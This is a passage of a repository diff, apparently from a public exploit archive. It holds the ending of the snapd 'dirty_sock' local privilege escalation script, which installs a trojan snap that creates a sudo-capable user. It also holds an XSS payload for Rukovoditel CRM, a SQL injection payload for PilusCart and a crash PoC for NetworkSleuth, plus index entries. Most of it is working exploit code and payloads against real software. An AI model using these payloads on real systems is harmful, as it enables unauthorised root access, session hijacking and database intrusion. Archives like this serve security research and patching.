# Now we can send the payload
http_req2 = post_payload
client_sock.sendall(http_req2.encode("latin-1"))
# Receive the data and extract the JSON
http_reply = client_sock.recv(8192).decode("utf-8")
# Exit on failure
if 'status-code":202' not in http_reply:
print("[!] Did not work, here is the API reply:\n\n")
print(http_reply)
sys.exit()
# Sleep to allow time for the snap to install correctly. Otherwise,
# The uninstall that follows will fail, leaving unnecessary traces
# on the machine.
time.sleep(8)
def print_success():
"""Prints a success message if we've made it this far"""
print("\n\n")
print("********************")
print("Success! You can now `su` to the following account and use sudo:")
print(" username: dirty_sock")
print(" password: dirty_sock")
print("********************")
print("\n\n")
def main():
"""Main program function"""
# Gotta have a banner...
print(BANNER)
# Check for any args (none needed)
check_args()
# Create a random name for the dirty socket file
sockfile = create_sockfile()
# Bind the dirty socket to the snapdapi
client_sock = bind_sock(sockfile)
# Delete trojan snap, in case there was a previous install attempt
delete_snap(client_sock)
# Install the trojan snap, which has an install hook that creates a user
install_snap(client_sock)
# Delete the trojan snap
delete_snap(client_sock)
# Remove the dirty socket file
os.remove(sockfile)
# Congratulate the lucky hacker
print_success()
if __name__ == '__main__':
main()

47
exploits/php/webapps/46366.txt Normal file
View file

@ -0,0 +1,47 @@
####################################################################
# Exploit Title : Rukovoditel Project Management CRM 2.4.1 - XSS Vulnerability (DOM BASED)
# Author [ Discovered By ] : Mehmet EMIROGLU
# Date : 29/01/2019
# Vendor Homepage : https://www.rukovoditel.net/
# Software Link : https://sourceforge.net/projects/rukovoditel/
# Affected Versions : 2.4.1
# Tested On : Wampp, Windows,Lampp
# Category : WebApps
# Exploit Risk : Medium
# CVE : 2019-7541
# Sofrware Description : Rukovoditel is a free web-based open-source
project management
application. A far cry from traditional applications, Rukovoditel gives
users a broader and extensive approach to project management. Its
customization options allow users to create additional entities, modify
and specify the relationship between them, and generate the necessary
reports.
####################################################################
# Impact :
*********
* This web application called as Rukovoditel Project Management CRM 2.4.1
version.
* first of all, delete the value string from the URL
(...module=users%2flogin)
* after, add the XSS code I've given below to the end of the URL.
* The proof will be the picture below.
* https://i.hizliresim.com/6aydM7.jpg
####################################################################
# PoC :
****************************
* XSS Code : "><img src=x
onerror=document.body.innerHTML=location.hash>#"><img src=x
onerror=prompt(123456789)>
* Value : users%2flogin
* Get Request : http://localhost/[PATH]/index.php?module=users%2flogin
* URL : http://localhost/rukovoditel/index.php?module="><img src=x
onerror=document.body.innerHTML=location.hash>#"><img src=x
onerror=prompt(123456789)>
####################################################################

34
exploits/php/webapps/46368.txt Normal file
View file

@ -0,0 +1,34 @@
####################################################################
# Exploit Title: PilusCart 1.4.1 - 'send' SQL Vulnerability
# Dork: N/A
# Date: 10-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/pilus/
# Software Link: https://sourceforge.net/projects/pilus/
# Version: 1.4.1
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A
# Software Description: PilusCart is a web-based online store management system, written in PHP scripting language as the most popular web programming language today. To store the data, PilusCart uses MySQL relational database management system.
####################################################################
# Vulnerabilities / Impact
# This web application called as PiLuS 1.4.1 version.
# Switch to the http://localhost/PiLUS/read-apa-itu-pdo
fill in the red-colored parts that I have given in the link
https://i.hizliresim.com/MV11La.jpg
Get in with the burp suite. and add the payload
at the end of the request to the attack pattern.
####################################################################
# POC - SQL (Boolean Based String)
# Parameters : send
# Attack Pattern : RLIKE (case when 7488715=7488715 then
0x656d69726f676c75 else 0x28 end)
# POST Request :
http://localhost/PiLUS/read-apa-itu-pdo?post_id=3&post_slug=apa-itu-pdo&nama_komentar=4866630&situs_web=9391510&captcha=4551404&token=473ec0c6bda264fefb8447c8ff01956248ea477c&isi_komentar=EMIROGLU2823174&send=Kirim
RLIKE
(case when 7488715=7488715 then 0x656d69726f676c75 else 0x28 end)

23
exploits/windows/dos/46367.py Executable file
View file

@ -0,0 +1,23 @@
# -*- coding: utf-8 -*-
# Exploit Title: NetworkSleuth 3.0 - Denial of Service (PoC)
# Date: 12/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.nsauditor.com/
# Software Link: http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Version: 3.0.0.0
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "NetworkSleuth.py", it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open NetworkSleuth.exe
# 4.- Go to Register > Enter Registration Code...
# 5.- Paste clipboard in 'Name' field
# 6.- Write '1234' in 'Key' field
# 7.- Clic on button -> Ok
# 8.- Crashed
buffer = "\x41" * 256
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()

14
files_exploits.csv
View file

@ -6300,11 +6300,13 @@ id,file,description,date,author,type,platform,port
46321,exploits/windows/dos/46321.py,"Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)",2019-02-05,"Victor Mondragón",dos,windows,
46322,exploits/windows/dos/46322.py,"River Past Audio Converter 7.7.16 - Denial of Service (PoC)",2019-02-05,Achilles,dos,windows,
46332,exploits/multiple/dos/46332.txt,"Skia - Incorrect Convexity Assumptions Leading to Buffer Overflows",2019-02-06,"Google Security Research",dos,multiple,
46337,exploits/android/dos/46337.sh,"AirDroid 4.2.1.6 - Denial of Service",2019-02-11,s4vitar,dos,android,
46338,exploits/windows/dos/46338.py,"FutureDj Pro 1.7.2.0 - Denial of Service",2019-02-11,Achilles,dos,windows,
46343,exploits/windows/dos/46343.py,"NordVPN 6.19.6 - Denial of Service (PoC)",2019-02-11,"Alejandra Sánchez",dos,windows,
46356,exploits/android/dos/46356.txt,"Android - binder Use-After-Free via fdget() Optimization",2019-02-12,"Google Security Research",dos,android,
46357,exploits/android/dos/46357.txt,"Android - binder Use-After-Free of VMA via race Between reclaim and munmap",2019-02-12,"Google Security Research",dos,android,
46358,exploits/asp/dos/46358.py,"Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow",2019-02-12,"Kaustubh G. Padwad",dos,asp,80
46367,exploits/windows/dos/46367.py,"NetworkSleuth 3.0 - 'Name' Denial of Service (PoC)",2019-02-13,"Alejandra Sánchez",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10292,8 +10294,9 @@ id,file,description,date,author,type,platform,port
46341,exploits/linux/local/46341.rb,"Evince - CBT File Command Injection (Metasploit)",2019-02-11,Metasploit,local,linux,
46345,exploits/windows/local/46345.py,"Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure",2019-02-11,"Nathu Nandwani",local,windows,
46346,exploits/windows/local/46346.py,"River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH)",2019-02-11,crash_manucoot,local,windows,
46359,exploits/linux/local/46359.md,"runc< 1.0-rc6 (Docker < 18.09.2) - Host Command Execution",2019-02-12,feexd,local,linux,
46360,exploits/linux/local/46360.md,"Ubuntu snapd < 2.37.1 - Local Privilege Escalation",2019-02-12,"Chris Moberly",local,linux,
46359,exploits/linux/local/46359.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution",2019-02-12,feexd,local,linux,
46361,exploits/linux/local/46361.py,"snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)",2019-02-13,"Chris Moberly",local,linux,
46362,exploits/linux/local/46362.py,"snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)",2019-02-13,"Chris Moberly",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17154,7 +17157,7 @@ id,file,description,date,author,type,platform,port
45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,
45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow",2018-12-18,"Rafael Pedrero",remote,windows,80
46024,exploits/multiple/remote/46024.rb,"Erlang - Port Mapper Daemon Cookie RCE (Metasploit)",2018-12-20,Metasploit,remote,multiple,25672
46034,exploits/multiple/remote/46034.py,"Netatalk < 3.1.12 - Authentication Bypass",2018-12-21,"Jacob Baines",remote,multiple,
46034,exploits/multiple/remote/46034.py,"Netatalk 3.1.12 - Authentication Bypass",2018-12-21,"Jacob Baines",remote,multiple,
46052,exploits/multiple/remote/46052.py,"Kubernetes - (Unauthenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
46073,exploits/linux/remote/46073.rb,"Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)",2019-01-02,Metasploit,remote,linux,
@ -40816,6 +40819,8 @@ id,file,description,date,author,type,platform,port
46330,exploits/php/webapps/46330.txt,"osCommerce 2.3.4.1 - 'reviews_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
46333,exploits/cgi/webapps/46333.txt,"Smoothwall Express 3.1-SP4 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,
46336,exploits/hardware/webapps/46336.html,"Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset",2019-02-11,"Adithyan AK",webapps,hardware,
46363,exploits/hardware/webapps/46363.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting",2019-02-13,"Ronnie T Baby",webapps,hardware,80
46364,exploits/hardware/webapps/46364.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)",2019-02-13,"Ronnie T Baby",webapps,hardware,80
46344,exploits/cgi/webapps/46344.txt,"IPFire 2.21 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,443
46347,exploits/php/webapps/46347.txt,"MyBB Bans List 1.0 - Cross-Site Scripting",2019-02-11,0xB9,webapps,php,80
46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - Authenticated Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php,
@ -40825,3 +40830,6 @@ id,file,description,date,author,type,platform,port
46352,exploits/linux/webapps/46352.rb,"Jenkins 2.150.2 - Remote Command Execution (Metasploit)",2019-02-12,AkkuS,webapps,linux,
46353,exploits/aspx/webapps/46353.cs,"BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution",2019-02-12,"Dustin Cobb",webapps,aspx,
46354,exploits/php/webapps/46354.txt,"LayerBB 1.1.2 - Cross-Site Scripting",2019-02-12,0xB9,webapps,php,80
46365,exploits/hardware/webapps/46365.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)",2019-02-13,"Ronnie T Baby",webapps,hardware,80
46366,exploits/php/webapps/46366.txt,"Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting",2019-02-13,"Mehmet EMIROGLU",webapps,php,80
46368,exploits/php/webapps/46368.txt,"PilusCart 1.4.1 - 'send' SQL Injection",2019-02-13,"Mehmet EMIROGLU",webapps,php,80

Can't render this file because it is too large.